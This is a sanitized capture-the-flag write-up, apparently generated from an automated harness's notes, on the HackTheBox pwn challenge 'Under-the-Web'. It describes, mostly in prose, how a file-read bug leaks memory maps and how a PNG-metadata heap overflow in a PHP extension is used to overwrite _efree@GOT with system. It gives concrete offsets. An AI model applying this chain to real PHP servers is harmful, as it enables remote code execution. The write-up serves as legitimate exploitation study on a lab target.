Under The Web
Under The Web is a sanitized challenge note from the local HTB archive, organized for quick review by category, difficulty, evidence flow, and reusable operator
Scenario
Under The Web attack path
Under The Web is a sanitized challenge note from the local HTB archive, organized for quick review by category, difficulty, evidence flow, and reusable operator
Objective
Challenge walkthrough focused on Pwn evidence, validation, and reusable operator lessons.
Walkthrough flow
Audited PHP routes and found view.php arbitrary local...
Used LFI to read process files such as...
Audited metadata_reader.so and found strcpy into...
Locally reproduced the boundary: 56-byte metadata...
Built a raw-PNG metadata payload that corrupts Zend...
Source coverage
High source coverage
Status: complete. This article is generated from 4 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.
High confidence: the page is reconstructed from a primary walkthrough plus multiple supporting notes or evidence sources. Treat the chain as source-backed, while still checking the listed source files for sensitive values.
- Pwn/Under-the-Web/writeup.md
- htb-challenge/Pwn/Under-the-Web/notes.md
- htb-challenge/Pwn/Under-the-Web/memory-summary.md
- htb-challenge/Pwn/Under-the-Web/hypothesis-board.md
Technical Walkthrough
Writeup
Challenge
- Name: Under-the-Web
- Category: Pwn
- Difficulty: Medium
- Mode: hybrid
Summary
Under-the-Web is a PHP web challenge backed by a vulnerable native PHP extension. The web layer has an arbitrary local file read in view.php, and the extension metadata_reader.so has a heap overflow while copying PNG text metadata with strcpy.
The final chain uses the LFI to leak /proc/self/maps, computes live libc and extension bases, crafts a PNG that corrupts Zend heap allocation state, overwrites _efree@GOT with system, and makes a metadata string execute a short command that copies the randomized flag to a known upload path.
Artifact Inventory
files/a12c7385-1413-45ca-99f9-03c9b443445b.zip: original HTB archive.files/extracted/pwn_under_the_web/view.php: arbitrary file read viaimage=andfile_get_contents.files/extracted/pwn_under_the_web/upload.php: PNG upload route, magic-byte and extension checked.files/extracted/pwn_under_the_web/metadata_reader.so: vulnerable native extension.files/extracted/pwn_under_the_web/Dockerfile: renamesflag.txtto a random hash-like filename during image build.analysis/artifact-inventory.json: hashes and file inventory.
Analysis
Source audit is recorded in analysis/source-audit.md.
view.php URL-decodes image, checks only file_exists, and returns base64_encode(file_get_contents($image)). This gives a read primitive for process files such as /proc/self/maps, confirmed in analysis/remote/proc-self-maps.txt.
metadata_reader.so reads PNG tEXt chunks and copies Title, Artist, and Copyright values into fixed 56-byte heap chunks with strcpy. Static evidence is in analysis/local/metadata_reader.objdump.txt. Runtime tests showed 56-byte metadata corrupts adjacent output and 57-byte metadata crashes the process, recorded in analysis/local/php-cli-crash-repro.txt and the upload response artifacts.
The initial shortcut ideas were closed:
- Overlay lowerdir
/app/flag.txtrecovery failed:analysis/remote/lowerdir-flag-probe.txt. - PHP wrapper bypasses for
file_existsfailed:analysis/remote/wrapper-probe-summary.txt.
Docker local reproduction was eventually enabled. The local exploit first failed because the local rebuilt libc had system at 0x4c490, while the remote leaked libc had system at 0x4c3a0. After leaking the remote libc and checking its symbols in analysis/remote/remote-libc-symbols.txt, the final remote run used the correct offset.
Solve
The reproducible solver is solve/solve.py.
High-level flow:
- Read
/proc/self/mapsthroughview.php. - Parse the live libc base and
metadata_reader.sobase. - Compute:
- system = libc_base + 0x4c3a0 for the leaked remote libc.
- _efree@GOT = metadata_reader_base + 0x4090.
- Build a PNG with raw
tEXtchunks:
- Artist: heap overflow padding plus _efree@GOT.
- Title: short shell command copying /app/[0-9a-f]* to /app/uploads/.underweb_flag.png.
- Copyright: system address.
- Upload the PNG. When the extension later frees metadata strings,
_efreeresolves tosystem, executing the copied Title command. - Read
/app/uploads/.underweb_flag.pngthroughview.php. - Store the matched HTB flag candidate in
loot/and capture it with the harness.
The successful remote evidence is analysis/remote/final-exploit-remote-correct-libc.txt.
Flag
Raw flag is stored in loot/flag.txt and intentionally not reproduced here.
Lessons
- When LFI leaks
/proc/self/maps, prefer live base addresses over assumptions from local rebuilds. - Local Docker reproduction is still valuable for heap exploit behavior, but exact libc offsets may differ from the spawned remote instance.
- A crash boundary can hide a useful primitive: here, 56-byte text metadata gave controlled heap corruption, while 57+ bytes produced visible crashes.
- For native PHP extension challenges, GOT overwrite can be cleaner than full ROP when the extension has writable relocation slots and calls a controllable function pointer path.
Source-Backed Dossier
The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.
Notes
Scope
- Challenge: Under-the-Web
- Category: Pwn
- Difficulty: Medium
- Mode: hybrid
- Remote instance: none
- Start time: 2026-06-12T06:47:04Z
- Operator: harness
- State file:
challenge-state.json
Harness Status
- Current phase: see
challenge-state.json - Next allowed actions: see
next-action.json - Raw flags and sensitive material stay in
loot/only. Do not paste them here.
Artifact Inventory
| File | Size | SHA256 | Type | Notes |
|---|---|---|---|---|
files/a12c7385-1413-45ca-99f9-03c9b443445b.zip | 2096589 | <hash redacted> | Zip archive data, at least v1.0 to extract, compression method=store | zip entries: 11 shown in artifact inventory JSON |
files/extracted/pwn_under_the_web/Dockerfile | 483 | <hash redacted> | ASCII text | |
files/extracted/pwn_under_the_web/flag.txt | 27 | <hash redacted> | ASCII text | |
files/extracted/pwn_under_the_web/index.php | 2371 | <hash redacted> | HTML document text, ASCII text | |
files/extracted/pwn_under_the_web/metadata_reader.so | 45152 | <hash redacted> | ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=<hash redacted>, with debug_info, not stripped | |
files/extracted/pwn_under_the_web/start.sh | 93 | <hash redacted> | Bourne-Again shell script text executable, ASCII text | |
files/extracted/pwn_under_the_web/upload.php | 3300 | <hash redacted> | PHP script text, ASCII text | |
files/extracted/pwn_under_the_web/uploads/starry_night.png | 1112785 | <hash redacted> | PNG image data, 757 x 599, 8-bit/color RGB, non-interlaced | |
files/extracted/pwn_under_the_web/uploads/the_potato_eaters.png | 960809 | <hash redacted> | PNG image data, 794 x 599, 8-bit/color RGBA, non-interlaced | |
files/extracted/pwn_under_the_web/view.php | 1672 | <hash redacted> | HTML document text, ASCII text |
Evidence Ledger
| Time | Action | Output/File | Finding | Confidence | Next |
|---|---|---|---|---|---|
| 2026-06-12T06:47:04Z | harness init | challenge-state.json | Workspace initialized with deterministic state file | High | Inventory artifacts |
| 2026-06-12T06:47:04Z | artifact inventory | analysis/artifact-inventory.json | 10 artifact(s) inventoried | High | Build or update hypotheses |
| 2026-06-12T06:48:16Z | hypothesis recorded | hypothesis-board.md | LFI leaks runtime/process state, then crafted PNG metadata triggers metadata_reader.so heap overflow to reach the randomized flag | Medium | Run a local Docker service, confirm LFI against /proc/self/maps, upload a long-text PNG, and compare local crash/leak behavior with remote only after instrumentation |
| 2026-06-12T06:48:16Z | source audit | analysis/source-audit.md | Source audit recorded | High | Gate before exploit |
| 2026-06-12T06:48:35Z | local memory search | analysis/research/local-memory-search-20260612T064835012551Z-693ea52d.md | Found 8 safe prior-note result(s) | Medium | Record useful result or skip |
| 2026-06-12T06:48:35Z | checkpoint recorded | analysis/checkpoint-triage-20260612T064835014322Z-b1bcc52d.md | Checkpoint for TRIAGE | High | Use checkpoint to drive next decision |
| 2026-06-12T06:48:49Z | instrumentation plan | analysis/instrumentation-plan.md | Validate the chain from arbitrary file read plus crafted PNG metadata into a usable flag-read primitive | High | Stop after two crafted PNG crashes without new control/leak evidence, if LFI cannot read useful process files, or if local reproduction diverges from remote behavior |
| 2026-06-12T06:49:29Z | RAG query | analysis/rag/rag-query-20260612T064849675838Z-6d9c2e0c.txt | RAG helper exited 0; output saved | Medium | Record retrieval tag and validation |
| 2026-06-12T06:50:25Z | RAG record | analysis/rag-records.md | Retrieved memory tagged GENERIC | Medium | Validate or reject with live evidence |
| 2026-06-12T06:50:25Z | local memory record | analysis/local-memory-records.md | Prior local notes reviewed as fallback/advisory context | Medium | Validate against current evidence |
| 2026-06-12T06:51:51Z | evaluator | analysis/evaluator-20260612T065151158557Z-112613ee.md | Proceed | High | Run gated probe.py LFI reads for /proc/self/cmdline and /proc/self/maps |
| 2026-06-12T06:55:38Z | branch closed | hypothesis-board.md | All lowerdir and upperdir /app/flag.txt candidates from /proc/self/mountinfo were missing or unreadable through view.php LFI | High | Rerank hypotheses |
| 2026-06-12T06:57:45Z | checkpoint recorded | analysis/checkpoint-analysis-20260612T065745753453Z-a6064f0b.md | Checkpoint for ANALYSIS | High | Use checkpoint to drive next decision |
| 2026-06-12T06:58:32Z | branch closed | hypothesis-board.md | Title length 57+ causes truncated response or connection reset even when the Title is the only metadata field; no leak or controlled output observed | High | Rerank hypotheses |
| 2026-06-12T06:59:05Z | branch closed | hypothesis-board.md | php://filter, glob://, and compress.zlib paths all returned Image not found because file_exists() blocked the wrapper paths | High | Rerank hypotheses |
| 2026-06-12T07:07:51Z | research record | analysis/research/research-records.md | Research tagged MATCHED | Medium | Validate against current evidence |
| 2026-06-12T07:07:51Z | evaluator | analysis/evaluator-20260612T070751086055Z-6091524c.md | Proceed | High | Execute solve.py remotely and capture the flag candidate |
| 2026-06-12T07:09:10Z | flag capture | loot/flag.txt | HTB-format flag captured; raw value kept in loot only | High | Write solution and run completion gate |
| 2026-06-12T07:10:47Z | completion gate | challenge-state.json | Completion gate passed; state marked COMPLETE | High | Optional sanitized memory summary approval |
Key Findings
-
RAG / Advisory Memory
RAG output is advisory only. Record evaluated retrievals with:
scripts/challenge_harness.py rag-record <workspace> --query "..." --tag MATCHED|PARTIAL|MISSING|<secret redacted>|GENERIC --validation "..."Secrets/Flags
Raw flags and sensitive material stay in loot/ only. Use scripts/challenge_harness.py capture-flag to validate and record flag capture without printing the value.
Memory Summary
Metadata
- Platform: HackTheBox Challenges
- Category: Pwn
- Challenge: Under-the-Web
- Difficulty: Medium
- Source workspace:
<local workspace>
Validated Solve Chain
Concepts only. Do not include raw flags, reusable credentials, tokens, cookies, private keys, or live secrets.
- Audited PHP routes and found
view.phparbitrary local file read guarded only byfile_exists. - Used LFI to read process files such as
/proc/self/mapsand leak live libc plusmetadata_reader.sobases. - Audited
metadata_reader.soand foundstrcpyinto fixed 56-byte heap chunks for PNG text metadata. - Locally reproduced the boundary: 56-byte metadata corrupts adjacent heap/output; 57+ bytes crashes the PHP process.
- Built a raw-PNG metadata payload that corrupts Zend heap allocation state so a later metadata allocation writes to
_efree@GOT. - Overwrote
_efree@GOTwithsystem, then used a short metadata string command to copy the randomized flag to a known upload path. - Retrieved the copied flag through
view.phpand captured it with the harness.
Reusable Lessons
- LFI of
/proc/self/mapscan remove the need for a separate address leak in native extension exploitation. - Validate libc offsets from the exact target libc. A local Docker rebuild can differ from the remote instance.
- If a heap overflow seems to only crash, test exact boundary lengths; off-by-one or fixed-chunk overflows can still create allocation-control primitives.
- For PHP extension pwn, writable GOT plus a later
_efreecall can provide a compactsystem(command)path.
Dead Ends
- Overlay lowerdir
/app/flag.txtrecovery from/proc/self/mountinfowas negative. - PHP wrapper bypasses such as
php://filter,glob://, andcompress.zlib://did not pass thefile_existscheck. - Simple long-metadata layouts gave crashes but no direct leak or flag without the GOT overwrite chain.
Tool Quirks
- Docker Desktop was initially stopped; starting it enabled exact local PHP container reproduction.
- GDB inside the amd64 container under Apple Silicon Docker emulation could not obtain registers reliably.
- The local rebuilt libc had
systemat0x4c490; the remote leaked libc hadsystemat0x4c3a0.
Evidence Paths
analysis/source-audit.mdanalysis/remote/proc-self-maps.txtanalysis/local/php-cli-crash-repro.txtanalysis/local/final-exploit-local-spaces.txtanalysis/remote/remote-libc-symbols.txtanalysis/remote/final-exploit-remote-correct-libc.txtsolve/solve.pyloot/flag.txt
Ingestion Decision
- Proposed for LightRAG: yes
- Requires user approval before ingestion: yes
Hypothesis Board
Keep no more than 3 active hypotheses on Easy/Medium and 5 on Hard unless the user explicitly asks for breadth.
| Rank | Path | Evidence | Missing Proof | Cheapest Validation | Confidence | Status |
|---|---|---|---|---|---|---|
| 1 | LFI leaks runtime/process state, then crafted PNG metadata triggers metadata_reader.so heap overflow to reach the randomized flag | view.php reads arbitrary existing paths; Dockerfile randomizes the flag filename in /app; metadata_reader.so uses 56-byte heap buffers and strcpy on PNG Title/Artist/Copyright text chunks | Run a local Docker service, confirm LFI against /proc/self/maps, upload a long-text PNG, and compare local crash/leak behavior with remote only after instrumentation | Medium | Active |
Closed Branches
| Branch | Evidence Tested | Failure Output | Reason Closed | Revisit Condition |
|---|---|---|---|---|
| Overlay lowerdir /app/flag.txt recovery | analysis/remote/lowerdir-flag-probe.txt | All lowerdir and upperdir /app/flag.txt candidates from /proc/self/mountinfo were missing or unreadable through view.php LFI | Only revisit if a new mountinfo/source clue identifies an accessible layer path or exact randomized flag filename | |
| Simple long tEXt metadata layouts as leak primitive | analysis/remote/upload-title57-only-response.html | Title length 57+ causes truncated response or connection reset even when the Title is the only metadata field; no leak or controlled output observed | Revisit only with local Docker/gdb/ZendMM instrumentation or a payload structure that predicts allocator behavior | |
| PHP wrapper bypass for file_exists LFI guard | analysis/remote/wrapper-probe-summary.txt | php://filter, glob://, and compress.zlib paths all returned Image not found because file_exists() blocked the wrapper paths | Only revisit if a PHP wrapper is found that returns true for file_exists() in PHP 8.2 and can list or transform target files |
Technical analogy
How to remember this solve
Think of the challenge as a small system with one rule that matters more than the rest. The solve is finding that rule, validating it, and using it carefully enough to reach the final proof.
For Under The Web, keep the mental model simple: identify the trusted assumption, prove it with the smallest safe test, then automate or repeat only the part that directly leads to the flag.